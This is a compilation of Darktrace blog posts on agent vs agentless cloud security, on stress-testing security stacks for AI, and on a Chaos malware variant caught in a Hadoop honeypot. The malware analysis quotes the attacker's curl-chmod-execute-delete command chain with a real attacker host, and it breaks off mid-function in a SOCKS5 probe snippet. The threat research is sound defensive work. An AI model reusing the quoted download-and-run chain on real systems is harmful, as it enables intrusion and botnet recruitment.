January 13, 2025

Agent vs. Agentless Cloud Security: Why Deployment Methods Matter

Cloud security solutions can be deployed with agentless or agent-based approaches or use a combination of methods. Organizations must weigh which method applies best to the assets and data the tool will protect.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Kellie Regan
Director, Product Marketing - Cloud Security

The rapid adoption of cloud technologies has brought significant security challenges for organizations of all sizes. According to recent studies, over 70% of enterprises now operate in hybrid or multi-cloud environments, with 93% employing a multi-cloud strategy[1]. This complexity requires robust security tools, but opinions vary on the best deployment method—agent-based, agentless, or a combination of both.

Agent-based and agentless cloud security approaches offer distinct benefits and limitations. Organizations often choose a deployment method based on the function of the assets covered, the types of data stored, and their cloud architecture, such as hybrid or multi-cloud deployments.

For example, agentless solutions are increasingly favored for their ease of deployment and ability to provide broad visibility across dynamic cloud environments. These are especially useful for DevOps teams, with 64% of organizations citing faster deployment as a key reason for adopting agentless tools[2].

On the other hand, agent-based solutions remain the preferred choice for environments requiring deep monitoring and granular control, such as securing sensitive high-value workloads in industries like finance and healthcare. In fact, over 50% of enterprises with critical infrastructure report relying on agent-based solutions for their advanced protection capabilities[3].

As the debate continues, many organizations are turning to combined approaches, leveraging the strengths of both agent-based and agentless tools to cover the full spectrum of their security needs. Understanding the capabilities and limitations of these methods is critical to building an effective cloud security strategy that adapts to evolving threats and complex infrastructures.

Agent-based cloud security

Agent-based security solutions involve deploying software agents on each device or system that needs protection. Agent-based solutions are great choices when you need in-depth monitoring and protection capabilities. They are ideal for organizations that require deep security controls and real-time active response, particularly in hybrid and on-premises environments.

Key advantages include:

1. Real-time monitoring and protection: Agents detect and block threats like malware, ransomware, and anomalous behaviors in real time, providing ongoing protection and enforcing compliance by continuously monitoring workload activities.  Agents enable full control over workloads for active response such as blocking IP addresses, killing processes, disabling accounts, and isolating infected systems from the network, stopping lateral movement.

2. Deep visibility for hybrid environments: Agent-based approaches allow for full visibility across on-premises, hybrid, and multi-cloud environments by deploying agents on physical and virtual machines. Agents offer detailed insights into system behavior, including processes, files, memory, network connections, and more, detecting subtle anomalies that might indicate security threats. Host-based monitoring tracks vulnerabilities at the system and application level, including unpatched software, rogue processes, and unauthorized network activity.

3. Comprehensive coverage: Agents are very effective in hybrid environments (cloud and on-premises), as they can be installed on both physical and virtual machines.  Agents can function independently on each host device onto which they are installed, which is especially helpful for endpoints that may operate outside of constant network connectivity.

Challenges:

1. Resource-intensive: Agents can consume CPU, memory, and network resources, which may affect performance, especially in environments with large numbers of workloads or ephemeral resources.

2. Challenging in dynamic environments: Managing hundreds or thousands of agents in highly dynamic or ephemeral environments (e.g., containers, serverless functions) can be complex and labor-intensive.

3. Slower deployment: Requires agent installation on each workload or instance, which can be time-consuming, particularly in large or complex environments.  

Agentless cloud security

Agentless security does not require software agents to be installed on each device. Instead, it uses cloud infrastructure and APIs to perform security checks. Agentless solutions are highly scalable with minimal impact on performance, which makes them ideal for cloud-native and highly dynamic environments such as serverless and containerized workloads. They are strong choices for cloud-native and multi-cloud environments where rapid deployment and scalability are critical and where response actions can be handled through external tools or manual processes.

Key advantages include:

1. Scalability and ease of deployment: Because agentless security doesn’t require installation on each individual device, it is much easier to deploy and can quickly scale across a vast number of cloud assets. This approach is ideal for environments where resources are frequently created and destroyed (e.g., serverless, containerized workloads), as there is no need for agent installation or maintenance.

2. Reduced system overhead: Without the need to run local agents, agentless security minimizes the impact on system performance. This is crucial in high-performance environments.

3. Broad visibility: Agentless security connects via API to cloud service providers, offering near-instant visibility and threat detection. It provides a comprehensive view of your cloud environment, making it easier to manage and secure large and complex infrastructures.

Challenges:

1. Infrastructure-level monitoring: Agentless solutions rely on cloud service provider logs and API calls, meaning that detection might not be as immediate as agent-based solutions. They collect configuration data and logs, focusing on infrastructure misconfigurations, identity risks, exposed resources, and network traffic, but lack visibility and access to detailed, system-level information such as running processes and host-level vulnerabilities.

2. Cloud-focused: Primarily for cloud environments, although some tools may integrate with on-premises systems through API-based data gathering. For organizations with hybrid cloud environments, this approach fragments visibility and security, leading to blind spots and increasing security risk.

3. Passive remediation: Typically provides alerts and recommendations, but lacks deep control over workloads, requiring manual intervention or orchestration tools (e.g., SOAR platforms) to execute responses. Some agentless tools trigger automated responses via cloud provider APIs (e.g., revoking permissions, adjusting security groups), but with limited scope.

Combined agent-based and agentless approaches

A combined approach leverages the strengths of both agent-based and agentless security. This hybrid strategy helps security teams achieve comprehensive coverage by:

  • Using agent-based solutions for deep, real-time protection and detailed monitoring of critical systems or sensitive workloads.
  • Employing agentless solutions for fast deployment, broader visibility, and easier scalability across all cloud assets, which is particularly useful in dynamic cloud environments where workloads frequently change.

The combined approach has distinct practical applications. For example, imagine a financial services company that deals with sensitive transactions. Its security team might use agent-based security for critical databases to ensure stringent protections are in place. Meanwhile, agentless solutions could be ideal for less critical, transient workloads in the cloud, where rapid scalability and minimal performance impact are priorities. With different data types and infrastructures, the combined approach is best.

Best of both worlds: The benefits of a combined approach

The combined approach not only maximizes security efficacy but also aligns with diverse operational needs. This means that all parts of the cloud environment are secured according to their risk profile and functional requirements. Agent-based deployment provides in-depth monitoring and active protection against threats, suitable for environments requiring tight security controls, such as financial services or healthcare data processing systems. Agentless deployment complements agents by offering broader visibility and easier scalability across diverse and dynamic cloud environments, ideal for rapidly changing cloud resources.

There are three major benefits from combining agent-based and agentless approaches.

1. Building a holistic security posture: By integrating both agent-based and agentless technologies, organizations can ensure that all parts of their cloud environments are covered—from persistent, high-risk endpoints to transient cloud resources. This comprehensive coverage is crucial for detecting and responding to threats promptly and effectively.

2. Reducing overhead while boosting scalability: Agentless systems require no software installation on each device, reducing overhead and eliminating the need to update and maintain agents on a large number of endpoints. This makes it easier to scale security as the organization grows or as the cloud environment changes.

3. Applying targeted protection where needed: Agent-based solutions can be deployed on selected assets that handle sensitive information or are critical to business operations, thus providing focused protection without incurring the costs and complexity of universal deployment.

Use cases for a combined approach

A combined approach gives security teams the flexibility to deploy agent-based and agentless solutions based on the specific security requirements of different assets and environments. As a result, organizations can optimize their security expenditures and operational efforts, allowing for greater adaptability in cloud security use cases.

Let’s take a look at how this could practically play out. In the combined approach, agent-based security can perform the following:

1. Deep monitoring and real-time protection:

  • Workload threat detection: Agent-based solutions monitor individual workloads for suspicious activity, such as unauthorized file changes or unusual resource usage, providing high granularity for detecting threats within critical cloud applications.
  • Behavioral analysis of applications: By deploying agents on virtual machines or containers, organizations can monitor behavior patterns and flag anomalies indicative of insider threats, lateral movement, or Advanced Persistent Threats (APTs).
  • Protecting high-sensitivity environments: Agents provide continuous monitoring and advanced threat protection for environments processing sensitive data, such as payment processing systems or healthcare records, leveraging capabilities like memory protection and file integrity monitoring.

2. Cloud asset protection:

  • Securing critical infrastructure: Agent-based deployments are ideal for assets like databases or storage systems that require real-time defense against exploits and ransomware.
  • Advanced packet inspection: For high-value assets, agents offer deep packet inspection and in-depth logging to detect stealthy attacks such as data exfiltration.
  • Customizable threat response: Agents allow for tailored security rules and automated responses at the workload level, such as shutting down compromised instances or quarantining infected files.

At the same time, agentless cloud security provides complementary benefits such as:

1. Broad visibility and compliance:

  • Asset discovery and management: Agentless systems can quickly scan the entire cloud environment to identify and inventory all assets, a crucial capability for maintaining compliance with regulations like GDPR or HIPAA, which require up-to-date records of data locations and usage.
  • Regulatory compliance auditing and configuration management: Quickly identify gaps in compliance frameworks like PCI DSS or SOC 2 by scanning configurations, permissions, and audit trails without installing agents. Using APIs to check configurations across cloud services ensures that all instances comply with organizational and regulatory standards, an essential aspect for maintaining security hygiene and compliance.
  • Shadow IT detection: Detect and map unauthorized cloud services or assets that are spun up without security oversight, ensuring full inventory coverage.

2. Rapid environmental assessment:

  • Vulnerability assessment of new deployments: In environments where new code is frequently deployed, agentless security can quickly assess new instances, containers, or workloads in CI/CD pipelines for vulnerabilities and misconfigurations, enabling secure deployments at DevOps speed.
  • Misconfiguration alerts: Detect and alert on common cloud configuration issues, such as exposed storage buckets or overly permissive IAM roles, across cloud providers like AWS, Azure, and GCP.
  • Policy enforcement: Validate that new resources adhere to established security baselines and organizational policies, preventing security drift during rapid cloud scaling.
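To make the misconfiguration check above more concrete, here is a minimal sketch of how an agentless tool might flag an overly permissive IAM-style policy once it has retrieved the policy document through a provider API. The function names and the sample policy are hypothetical, and the rule (wildcard action combined with a wildcard resource) is only one simple heuristic, not a description of how any particular product works.

```python
from typing import Any


def _as_list(value: Any) -> list:
    """IAM-style fields may hold a single value or a list of values."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def find_permissive_statements(policy: dict) -> list[dict]:
    """Return Allow statements that pair a wildcard action with Resource "*"."""
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        # "*" grants everything; "service:*" grants every action in one service.
        wildcard_action = any(a == "*" or a.endswith(":*") for a in actions)
        wildcard_resource = "*" in resources
        if wildcard_action and wildcard_resource:
            findings.append(stmt)
    return findings


# Hypothetical policy document, shaped like an AWS IAM JSON policy.
sample_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::reports/*"},
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
    ],
}

flagged = find_permissive_statements(sample_policy)
print(f"{len(flagged)} overly permissive statement(s) found")
```

Because the check only reads configuration data, it needs no software on the workload itself, which is the property the agentless model relies on.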

Combining agent-based and agentless approaches in cloud security not only maximizes the protective capabilities, but also offers flexibility, efficiency, and comprehensive coverage tailored to the diverse and evolving needs of modern cloud environments. This integrated strategy ensures that organizations can protect their assets more effectively while also adapting quickly to new threats and regulatory requirements.

Darktrace offers complementary and flexible deployment options for holistic cloud security

Powered by multilayered AI, Darktrace / CLOUD is a Cloud Detection and Response (CDR) solution that is agentless by default, with optional lightweight, host-based server agents for enhanced real-time actioning and deep inspection. As such, it can deploy in cloud environments in minutes and provide unified visibility and security across hybrid, multi-cloud environments.

With any deployment method, Darktrace supports multi-tenant, hybrid, and serverless cloud environments. Its Self-Learning AI learns the normal behavior across architectures, assets, and users to identify unusual activity that may indicate a threat. With this approach, Darktrace / CLOUD quickly disarms threats, whether they are known, unknown, or completely novel. It then accelerates the investigation process and responds to threats at machine speed.

Learn more about how Darktrace / CLOUD secures multi and hybrid cloud environments in the Solution Brief.

References:

1. Flexera 2023 State of the Cloud Report

2. ESG Research 2023 Report on Cloud-Native Security

3. Gartner, Market Guide for Cloud Workload Protection Platforms, 2023


April 8, 2026

How to Secure AI and Find the Gaps in Your Security Operations


What “securing AI” actually means (and doesn’t)

Security teams are under growing pressure to “secure AI” at the same pace at which businesses are adopting it. But in many organizations, adoption is outpacing the ability to govern, monitor, and control it. When that gap widens, decision-making shifts from deliberate design to immediate coverage. The priority becomes getting something in place, whether that’s a point solution, a governance layer, or an extension of an existing platform, rather than ensuring those choices work together.

At the same time, AI governance is lagging adoption. 37% of organizations still lack AI adoption policies, shadow AI usage across SaaS has surged, and there are notable spikes in anomalous data uploads to generative AI services.  

First and foremost, it’s important to recognize the dual nature of AI risk. Much of the industry has focused on how attackers will use AI to move faster, scale campaigns, and evade detection. But what’s becoming just as significant is the risk introduced by AI inside the organization itself. Enterprises are rapidly embedding AI into workflows, SaaS platforms, and decision-making processes, creating new pathways for data exposure, privilege misuse, and unintended access across an already interconnected environment.

Because the introduction of complex AI systems into modern, hybrid environments is reshaping attacker behavior and exposing gaps between security functions, the challenge is no longer just having the right capabilities in place but effectively coordinating prevention, detection, investigation, response, and remediation together. As threats accelerate and systems become more interconnected, security depends on coordinated execution, not isolated tools, which is why lifecycle-based approaches to governance, visibility, behavioral oversight, and real-time control are gaining traction.

From cloud consolidation to AI systems: what we can learn

We have seen a version of AI adoption before in cloud security. In the early days, tooling fragmented into posture, workload/runtime, identity, data, and more. Gradually, cloud security collapsed into broader cloud platforms. The lesson was clear: posture without runtime misses active threats; runtime without posture ignores root causes. Strong programs ran both in parallel and stitched the findings together in operations.  

Today’s AI wave stretches that lesson across every domain. Adversaries are compressing “time‑to‑tooling” using LLM‑assisted development (“vibecoding”) and recycling public PoCs at unprecedented speed. That makes it difficult to secure through siloed controls, because the risk is not confined to one layer. It emerges through interactions across layers.

Keep in mind, most modern attacks don’t succeed by defeating a single control. They succeed by moving through the gaps between systems faster than teams can connect what they are seeing. Recent exploitation waves like React2Shell show how quickly opportunistic actors operationalize fresh disclosures and chain misconfigurations to monetize at scale.

In the React2Shell window, defenders observed rapid, opportunistic exploitation and iterative payload diversity across a broad infrastructure footprint, strains that outpace signature‑first thinking.  

You can stay up to date on attacker behavior by signing up for our newsletter where Darktrace’s threat research team and analyst community regularly dive deep into threat finds.

Ultimately, speed met scale in the cloud era; AI adds interconnectedness and orchestration. Simple questions — What happened? Who did it? Why? How? Where else? — now cut across identities, SaaS agents, model/service endpoints, data egress, and automated actions. The longer it takes to answer, the worse the blast radius becomes.

The case for a platform approach in the age of AI

Think of security fusion as the connective tissue that lets you prevent, detect, investigate, and remediate in parallel, not in sequence. In practice, that looks like:

  1. Unified telemetry with behavioral context across identities, SaaS, cloud, network, endpoints, and email, so an anomalous action in one plane automatically informs expectations in others. (Inside‑the‑SOC investigations show this pays off when attacks hop fast between domains.)
  2. Pre‑CVE and “in‑the‑wild” awareness feeding controls before signatures, reducing dwell time in fast exploitation windows.
  3. Automated, bounded response that can contain likely‑malicious actions at machine speed without breaking workflows, buying analysts time to investigate with full context. (Rapid CVE coverage and exploit‑wave posts illustrate how critical those first minutes are.)
  4. Investigation workflows that assume AI is in the loop, for both defenders and attackers. As adversaries adopt “agentic” patterns, investigations need graph‑aware, sequence‑aware reasoning to prioritize what matters early.

This isn’t theoretical. It’s reflected in the Darktrace posts that consistently draw readership: timely threat intel with proprietary visibility and executive frameworks that transform field findings into operating guidance.  

The five questions that matter (and the one that matters more)

When alerted to malicious or risky AI use, you’ll ask:

  1. What happened?
  2. Who did it?
  3. Why did they do it?
  4. How did they do it?
  5. Where else can this happen?

The sixth, more important question is: How much worse does it get while you answer the first five? The answer depends on whether your controls operate in sequence (slow) or in fused parallel (fast).

What to watch next: How the AI security market will likely evolve

Security markets tend to follow a familiar pattern. New technologies drive an initial wave of specialized tools (posture, governance, observability) each focused on a specific part of the problem. Over time, those capabilities consolidate as organizations realize the new challenge is coordination.

AI is accelerating the shift of focus to coordination because AI-powered attackers can move faster and operate across more systems at once. Recent exploitation waves show exactly this. Adversaries can operationalize new techniques and move across domains, turning small gaps into full attack paths.

Anticipate a continued move toward more integrated security models because fragmented approaches can’t keep up with the speed and interconnected nature of modern attacks.

Building the Groundwork for Secure AI: How to Test Your Stack’s True Maturity

AI doesn’t create new surfaces as much as it exposes the fragility of the seams that already exist.  

Darktrace’s own public investigations consistently show that modern attacks, from LinkedIn‑originated phishing that pivots into corporate SaaS to multi‑stage exploitation waves like BeyondTrust CVE‑2026‑1731 and React2Shell, succeed not because a single control failed, but because no control saw the whole sequence, or no system was able to respond at the speed of escalation.  

Before thinking about “AI security,” customers should ensure they’ve built a security foundation where visibility, signals, and responses can pass cleanly between domains. That requires pressure‑testing the seams.

Below are the key integration questions and stack‑maturity tests every organization should run.

1. Do your controls see the same event the same way?

Integration questions

  • When an identity behaves strangely (impossible travel, atypical OAuth grants), does that signal automatically inform your email, SaaS, cloud, and endpoint tools?
  • Do your tools normalize events in a way that lets you correlate identity → app → data → network without human stitching?

Why it matters

Darktrace’s public SOC investigations repeatedly show attackers starting in an unmonitored domain, then pivoting into monitored ones, such as phishing on LinkedIn that bypassed email controls but later appeared as anomalous SaaS behavior.

If tools can’t share or interpret each other's context, AI‑era attacks will outrun every control.

Tests you can run

  1. Shadow Identity Test
  • Create a temporary identity with no history.
  • Perform a small but unusual action: unusual browser, untrusted IP, odd OAuth request.
  • Expected maturity signal: other tools (email/SaaS/network) should immediately score the identity as high‑risk.
  2. Context Propagation Test
  • Trigger an alert in one system (e.g., endpoint anomaly) and check if other systems automatically adjust thresholds or sensitivity.
  • Low maturity signal: nothing changes unless an analyst manually intervenes.

2. Does detection trigger coordinated action, or does everything act alone?

Integration questions

  • When one system blocks or contains something, do other systems automatically tighten, isolate, or rate‑limit?
  • Does your stack support bounded autonomy — automated micro‑containment without broad business disruption?

Why it matters

In public cases like BeyondTrust CVE‑2026‑1731 exploitation, Darktrace observed rapid C2 beaconing, unusual downloads, and tunneling attempts across multiple systems. Containment windows were measured in minutes, not hours.  

Tests you can run

  1. Chain Reaction Test
  • Simulate a primitive threat (e.g., access from TOR exit node).
  • Your identity provider should challenge → email should tighten → SaaS tokens should re‑authenticate.
  • Weak seam indicator: only one tool reacts.
  2. Autonomous Boundary Test
  • Induce a low‑grade anomaly (credential spray simulation).
  • Evaluate whether automated containment rules activate without breaking legitimate workflows.

3. Can your team investigate a cross‑domain incident without swivel‑chairing?

Integration questions

  • Can analysts pivot from identity → SaaS → cloud → endpoint in one narrative, not five consoles?
  • Does your investigation tooling use graphs or sequence-based reasoning, or is it list‑based?

Why it matters

Darktrace’s Cyber AI Analyst and DIGEST research highlights why investigations must interpret structure and progression, not just standalone alerts. Attackers now move between systems faster than human triage cycles.  

Tests you can run

  1. One‑Hour Timeline Build Test
  • Pick any detection.
  • Give an analyst one hour to produce a full sequence: entry → privilege → movement → egress.
  • Weak seam indicator: they spend >50% of the hour stitching exports.
  2. Multi‑Hop Replay Test
  • Simulate an incident that crosses domains (phish → SaaS token → data access).
  • Evaluate whether the investigative platform auto‑reconstructs the chain.
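As a rough illustration of what "auto-reconstructing the chain" involves, the sketch below merges events from several domains into one chronological timeline for a single entity. The `Event` fields, the shared `entity` identifier, and the sample data are all hypothetical; real platforms would also need to resolve identities across tools, which this sketch simply assumes has been done.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class Event:
    timestamp: datetime
    domain: str   # e.g. "email", "saas", "cloud"
    entity: str   # hypothetical identifier shared across tools
    action: str


def build_timeline(events: list[Event], entity: str) -> list[Event]:
    """Return one entity's events from every domain in chronological order."""
    return sorted((e for e in events if e.entity == entity), key=lambda e: e.timestamp)


def domains_crossed(timeline: list[Event]) -> list[str]:
    """List the domains in the order the entity first appeared in each."""
    seen: list[str] = []
    for event in timeline:
        if event.domain not in seen:
            seen.append(event.domain)
    return seen


# Hypothetical exports from three separate consoles, deliberately out of order.
events = [
    Event(datetime(2026, 4, 1, 9, 20), "cloud", "j.doe", "bulk object download"),
    Event(datetime(2026, 4, 1, 9, 0), "email", "j.doe", "clicked phishing link"),
    Event(datetime(2026, 4, 1, 9, 5), "saas", "j.doe", "new OAuth token issued"),
    Event(datetime(2026, 4, 1, 9, 10), "saas", "a.smith", "routine login"),
]

timeline = build_timeline(events, "j.doe")
for event in timeline:
    print(event.timestamp.isoformat(), event.domain, event.action)
print(" -> ".join(domains_crossed(timeline)))
```

If an analyst has to perform this merge by hand from exported files, that manual stitching is the weak seam the One‑Hour Timeline Build Test is meant to expose.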

4. Do you detect intent or only outcomes?

Integration questions

  • Can your stack detect the setup behaviors before an attack becomes irreversible?
  • Are you catching pre‑CVE anomalies or post‑compromise symptoms?

Why it matters

Darktrace publicly documents multiple examples of pre‑CVE detection, where anomalous behavior was flagged days before vulnerability disclosure. AI‑assisted attackers will hide behind benign‑looking flows until the very last moment.

Tests you can run

  1. Intent‑Before‑Impact Test
  • Simulate reconnaissance-like behavior (DNS anomalies, odd browsing to unknown SaaS, atypical file listing).
  • Mature systems will flag intent even without an exploit.
  2. CVE‑Window Test
  • During a real CVE patch cycle, measure detection lag vs. public PoC release.
  • Weak seam indicator: your detection rises only after mass exploitation begins.
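The detection lag in the CVE‑Window Test is simple arithmetic on two timestamps. The following sketch shows one way to record it; the 24-hour budget, the verdict labels, and the sample timestamps are assumptions chosen for illustration, not thresholds taken from this article.

```python
from datetime import datetime, timedelta, timezone


def detection_lag(poc_released: datetime, first_detection: datetime) -> timedelta:
    """Positive lag: detection followed the PoC. Negative: detection came first."""
    return first_detection - poc_released


def lag_verdict(lag: timedelta, budget: timedelta = timedelta(hours=24)) -> str:
    """Classify a lag against an assumed, organization-specific budget."""
    if lag <= timedelta(0):
        return "ahead of PoC"
    return "within budget" if lag <= budget else "weak seam"


# Hypothetical timestamps for one patch cycle (UTC).
poc = datetime(2026, 1, 10, 9, 0, tzinfo=timezone.utc)
detected = datetime(2026, 1, 10, 15, 0, tzinfo=timezone.utc)

lag = detection_lag(poc, detected)
print(lag, lag_verdict(lag))
```

Tracking this number across several patch cycles gives a trend rather than a single data point, which is more useful for judging whether detection is improving.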

5. Are response and remediation two separate universes?

Integration questions

  • When you contain something, does that trigger root-cause remediation workflows in identity, cloud config, or SaaS posture?
  • Does fixing a misconfiguration automatically update correlated controls?

Why it matters

Darktrace’s cloud investigations (e.g., cloud compromise analysis) emphasize that remediation must close both runtime and posture gaps in parallel.

Tests you can run

  1. Closed‑Loop Remediation Test
  • Introduce a small misconfiguration (over‑permissioned identity).
  • Trigger an anomaly.
  • Mature stacks will: detect → contain → recommend or automate posture repair.
  2. Drift‑Regression Test
  • After remediation, intentionally re‑introduce drift.
  • The system should immediately recognize deviation from known‑good baseline.

6. Do SaaS, cloud, email, and identity all agree on “normal”?

Integration questions

  • Is “normal behavior” defined in one place or many?
  • Do baselines update globally or per-tool?

Why it matters

Attackers (including AI‑assisted ones) increasingly exploit misaligned baselines, behaving “normal” to one system and anomalous to another.

Tests you can run

  1. Baseline Drift Test
  • Change the behavior of a service account for 24 hours.
  • Mature platforms will flag the deviation early and propagate updated expectations.
  2. Cross‑Domain Baseline Consistency Test
  • Compare identity’s risk score vs. cloud vs. SaaS.
  • Weak seam indicator: risk scores don’t align.
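One simple way to run the Cross‑Domain Baseline Consistency Test is to collect each tool's risk score for the same identity and look at the spread. The sketch below assumes the scores have already been normalized to a 0 to 1 scale, and the 0.3 tolerance is an arbitrary placeholder; both are assumptions, since tools rarely share a scoring scale out of the box.

```python
def score_spread(scores: dict[str, float]) -> float:
    """Difference between the highest and lowest score for one identity."""
    if not scores:
        raise ValueError("at least one score is required")
    return max(scores.values()) - min(scores.values())


def is_misaligned(scores: dict[str, float], tolerance: float = 0.3) -> bool:
    """True when tools disagree about the same identity by more than tolerance."""
    return score_spread(scores) > tolerance


# Hypothetical normalized risk scores for one service account.
disagreeing = {"identity": 0.9, "cloud": 0.2, "saas": 0.4}
agreeing = {"identity": 0.5, "cloud": 0.55, "saas": 0.6}

print("disagreeing:", is_misaligned(disagreeing))
print("agreeing:", is_misaligned(agreeing))
```

A large spread does not say which tool is right, only that their baselines have diverged and need to be reconciled.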

Final takeaway

Security teams should focus on how their stack operates as one system before AI amplifies pressure on every seam.

Only once an organization can reliably detect, correlate, and respond across domains can it safely begin to secure AI models, agents, and workflows.

About the author
Nabil Zoldjalali
VP, Field CISO

April 7, 2026

Darktrace Identifies New Chaos Malware Variant Exploiting Misconfigurations in the Cloud


Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.

One example of software targeted within Darktrace’s honeypots is Hadoop, an open-source framework developed by Apache that enables the distributed processing of large data sets across clusters of computers. In Darktrace’s honeypot environment, the Hadoop instance is intentionally misconfigured to allow attackers to achieve remote code execution on the service. In one example from March 2026, this enabled Darktrace to identify and further investigate activity linked to Chaos malware.

What is Chaos Malware?

First discovered by Lumen’s Black Lotus Labs, Chaos is a Go-based malware [1]. It is speculated to be of Chinese origin, based on Chinese language characters found within strings in the sample and the presence of zh-CN locale indicators. Based on code overlap, Chaos is likely an evolution of the Kaiji botnet.

Chaos has historically targeted routers and primarily spreads through SSH brute-forcing and known Common Vulnerabilities and Exposures (CVEs) in router software. It then uses infected devices as part of a Distributed Denial-of-Service (DDoS) botnet and for cryptomining.

Darktrace’s view of a Chaos Malware Compromise

The attack began when a threat actor sent a request to an endpoint on the Hadoop deployment to create a new application.

Figure 1: The initial infection being delivered to the unsecured endpoint.

This defines a new application with an initial command to run inside the container, specified in the command field of the am-container-spec section. This, in turn, initiates several shell commands:

  • curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0. - downloads a file from the attacker’s server, in this case a Chaos agent malware executable.
  • chmod 777 7c49006c2e417f20c732409ead2d6cc0. - sets permissions to allow all users to read, write, and execute the malware.
  • ./7c49006c2e417f20c732409ead2d6cc0. - executes the malware.
  • rm -rf 7c49006c2e417f20c732409ead2d6cc0. - deletes the malware file from the disk to reduce traces of activity.

In practice, once this application is created, an attacker-defined binary is downloaded from the attacker's server, executed on the system, and then removed to hinder forensic recovery. The domain pan.tenire[.]com has previously been observed in another campaign, dubbed “Operation Silk Lure”, which delivered the ValleyRAT Remote Access Trojan (RAT) via malicious job application resumes. Like Chaos, this campaign featured extensive Chinese characters throughout its stages, including within the fake resumes themselves. The domain resolves to 107[.]189.10.219, a virtual private server (VPS) hosted in BuyVM’s Luxembourg location, a provider known for offering low-cost VPS services.
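The download, chmod, execute, delete sequence described above can be flagged in application submissions before they run. The following is a minimal sketch, assuming the submission body is JSON with the launch command nested under am-container-spec as commands.command, and assuming the individual steps are chained with shell separators such as && or ;. The function names, the regular expressions, and the placeholder URL are illustrative and do not come from the observed attack.

```python
import json
import re

# Illustrative heuristics for each stage of a download-execute-delete chain.
DOWNLOAD = re.compile(r"\b(curl|wget)\b")
MAKE_EXECUTABLE = re.compile(r"\bchmod\b")
EXECUTE = re.compile(r"(^|\s)\./\S+")
DELETE = re.compile(r"\brm\b")
STAGES = [DOWNLOAD, MAKE_EXECUTABLE, EXECUTE, DELETE]


def extract_command(submission: dict) -> str:
    """Return the launch command from an application submission body.

    Assumes the command sits at am-container-spec -> commands -> command.
    """
    spec = submission.get("am-container-spec", {})
    return spec.get("commands", {}).get("command", "")


def split_steps(command: str) -> list[str]:
    """Split a shell one-liner on the separators &&, || and ;."""
    return [s.strip() for s in re.split(r"&&|\|\||;", command) if s.strip()]


def looks_like_dropper(command: str) -> bool:
    """True if the steps contain download, chmod, execute, delete in order."""
    stage = 0
    for step in split_steps(command):
        if stage < len(STAGES) and STAGES[stage].search(step):
            stage += 1
    return stage == len(STAGES)


if __name__ == "__main__":
    # Hypothetical submission body with a placeholder URL and file name.
    body = json.loads("""
    {
      "am-container-spec": {
        "commands": {
          "command": "curl -L -O http://example.invalid/payload && chmod 777 payload && ./payload && rm -rf payload"
        }
      }
    }
    """)
    print(looks_like_dropper(extract_command(body)))
```

A check like this is only a heuristic: an attacker can reorder or obfuscate the steps, so it complements, rather than replaces, restricting access to the application submission endpoint.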

Analysis of the updated Chaos malware sample

Chaos has historically targeted routers and other edge devices, making compromises of Linux server environments a relatively new development. The sample observed by Darktrace in this compromise is a 64-bit ELF binary, whereas most router hardware runs on ARM, MIPS, or PowerPC architectures, often in 32-bit variants.

The malware sample used in the attack has undergone notable restructuring compared to earlier versions. The default namespace has been changed from “main_chaos” to just “main”, and several functions have been reworked. Despite these changes, the sample retains its core features, including persistence mechanisms established via systemd and a malicious keep-alive script stored at /boot/system.pub.

Figure 2: The creation of the systemd persistence service.
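Defenders can look for this kind of persistence by checking whether any systemd unit launches a file from /boot, which normally holds kernel and bootloader files rather than service scripts. The sketch below is a minimal example under stated assumptions: the unit contents in the usage example are hypothetical (the real unit written by the malware is not reproduced here), and only the /boot/system.pub path comes from the analysis above.

```python
# Directory prefix treated as suspicious for service executables.
# Only /boot/ is motivated by the analysis; extend as needed.
SUSPICIOUS_PREFIXES = ("/boot/",)


def suspicious_exec_targets(unit_text: str) -> list[str]:
    """Return paths on ExecStart* lines that live under a suspicious prefix."""
    hits = []
    for raw in unit_text.splitlines():
        key, sep, value = raw.strip().partition("=")
        if not sep or not key.strip().startswith("ExecStart"):
            continue
        for token in value.split():
            # systemd allows special prefix characters before the executable.
            token = token.lstrip("-@+!:")
            if token.startswith(SUSPICIOUS_PREFIXES):
                hits.append(token)
    return hits


if __name__ == "__main__":
    # Hypothetical unit file for illustration only.
    unit = """
    [Unit]
    Description=example

    [Service]
    ExecStart=/bin/bash /boot/system.pub
    Restart=always
    """
    print(suspicious_exec_targets(unit))
```

In practice the function would be run over the unit files found in the system's systemd directories, with any hits reviewed manually.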

Likewise, the functions to perform DDoS attacks are still present, with methods that target the following protocols:

  • HTTP
  • TLS
  • TCP
  • UDP
  • WebSocket

However, several features such as the SSH spreader and vulnerability exploitation functions appear to have been removed. In addition, several functions that were previously believed to be inherited from Kaiji have also been changed, suggesting that the threat actors have either rewritten the malware or refactored it extensively.

A new function of the malware is a SOCKS proxy. When the malware receives a StartProxy command from the command-and-control (C2) server, it begins listening on an attacker-controlled TCP port and operates as a SOCKS5 proxy, allowing the attacker to route their traffic through the compromised server. This capability offers several advantages: it enables the threat actor to launch attacks from the victim’s internet connection, making the activity appear to originate from the victim instead of the attacker, and it allows the attacker to pivot into internal networks only accessible from the compromised server.

Figure 3: The command processor for StartProxy. Due to endianness, the string is reversed.
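One way to check whether an unexpected listening port on a server you manage is behaving as a SOCKS5 proxy is to send the standard SOCKS5 client greeting and inspect the two-byte reply. The following is a minimal sketch based on the generic SOCKS5 handshake (RFC 1928), not on the malware's own code. Whether the Chaos proxy requires authentication is not stated in this analysis, so the probe only confirms that the listener speaks SOCKS5. The function names are illustrative.

```python
import socket

SOCKS5_VERSION = 0x05
NO_AUTH = 0x00


def build_greeting(methods=(NO_AUTH,)) -> bytes:
    """Client greeting: version, number of methods, then the method ids."""
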